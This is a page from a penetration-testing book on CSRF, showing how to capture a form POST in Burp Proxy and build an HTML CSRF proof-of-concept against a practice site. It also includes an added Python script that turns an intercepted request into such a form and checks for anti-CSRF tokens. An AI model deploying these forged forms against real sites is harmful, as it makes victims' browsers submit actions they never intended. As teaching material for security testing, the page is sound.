Page 110 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
In order to build our CSRF PoC, it can be helpful to see the form as an HTTP action, so we
can grab the data encoding type, HTTP verb, and form-field information all at once.
In order to view that request, make sure you're viewing the page in a browser connected to
your Burp Proxy, then turn the intercept feature on from within the Proxy tab. When you
click Submit, you should see the form hang as the Burp Proxy intercepts (and holds onto) the
form's HTTP POST request:
From this, we can deduce all the necessary parts of our CSRF PoC. Let's take a look at the
code and then break down the rationale behind each tag and attribute:
<html>
<form enctype="application/x-www-form-urlencoded" method="POST"
action="http://webscantest.com/crosstraining/aboutyou.php">
<label>fname</label><input type="text" value="William"
name="fname">
<label>nick</label><input type="text" value="Private Mandella"
name="nick">
<label>lname</label><input type="text" value="Mandella"
name="lname">
<label>submit</label><input type="text" value="submit"
name="submit">
<input type="submit"
value="http://webscantest.com/crosstraining/aboutyou.php">
</form>
</html>
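The deduction step the text describes (reading the verb, encoding and field names off the intercepted request) can be scripted. The following is an added example, not code from the book: it parses a constructed stand-in for the intercepted POST (same endpoint and field names as the page; the Host, Cookie and Content-Length headers are assumed), reports whether the request is the kind a plain cross-site HTML form could reproduce (form-sendable content type, cookie-based auth, no token-like field or custom header), and renders the equivalent form in the shape of the PoC above.

```python
"""Parse an intercepted HTTP request and work out what a CSRF PoC needs.

Added example for the chapter text. The request below is a constructed
stand-in for the Burp-intercepted POST described on the page; the
endpoint and field names come from the page, the headers are assumed.
"""
import html
import re
from urllib.parse import parse_qsl

# Constructed sample of the intercepted request (not a real capture).
RAW_REQUEST = (
    "POST /crosstraining/aboutyou.php HTTP/1.1\r\n"
    "Host: webscantest.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=EXAMPLE-SESSION-ID\r\n"
    "Content-Length: 64\r\n"
    "\r\n"
    "fname=William&nick=Private+Mandella&lname=Mandella&submit=submit"
)

# Content types a plain HTML <form> can send without a CORS preflight;
# a target that accepts one of these can be hit by a cross-site form.
FORM_SENDABLE = {"application/x-www-form-urlencoded",
                 "multipart/form-data", "text/plain"}
# Parameter names that usually indicate an anti-CSRF token is in play.
TOKEN_HINT = re.compile(r"csrf|xsrf|token|nonce|authenticity", re.I)


def parse_request(raw):
    """Split a raw request into method, absolute action URL, enctype and fields."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    enctype = headers.get("content-type", "").split(";")[0].strip().lower()
    fields = []
    if enctype == "application/x-www-form-urlencoded":
        fields = parse_qsl(body, keep_blank_values=True)
    return {
        "method": method,
        "action": f"http://{headers.get('host', '')}{path}",
        "enctype": enctype,
        "fields": fields,
        "headers": headers,
    }


def csrf_exposure(req):
    """Report the CSRF preconditions visible in the request itself."""
    token_fields = [n for n, _ in req["fields"] if TOKEN_HINT.search(n)]
    custom_headers = [h for h in req["headers"] if h.startswith("x-")]
    form_sendable = req["enctype"] in FORM_SENDABLE
    return {
        "form_sendable": form_sendable,
        "token_fields": token_fields,
        "custom_headers": custom_headers,
        "cookie_auth": "cookie" in req["headers"],
        # A browser-sendable body with no token and no custom header is
        # exactly what a static HTML form can replay.
        "replayable_by_form": form_sendable and not token_fields and not custom_headers,
    }


def form_from_request(req):
    """Render the request as an HTML form, the shape of the page's PoC."""
    inputs = "\n".join(
        f'  <label>{html.escape(n)}</label>'
        f'<input type="text" value="{html.escape(v)}" name="{html.escape(n)}">'
        for n, v in req["fields"]
    )
    return (
        f'<form enctype="{req["enctype"]}" method="{req["method"]}" '
        f'action="{html.escape(req["action"])}">\n'
        f"{inputs}\n"
        '  <input type="submit" value="submit">\n'
        "</form>"
    )


if __name__ == "__main__":
    parsed = parse_request(RAW_REQUEST)
    print(csrf_exposure(parsed))
    print(form_from_request(parsed))
```

The `replayable_by_form` flag is the thing to look at when triaging: if it is true, the request has nothing a cross-origin form cannot supply, which is the finding the PoC above demonstrates; a token-like field or a custom request header turns it false and is the first mitigation to check on the server side.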

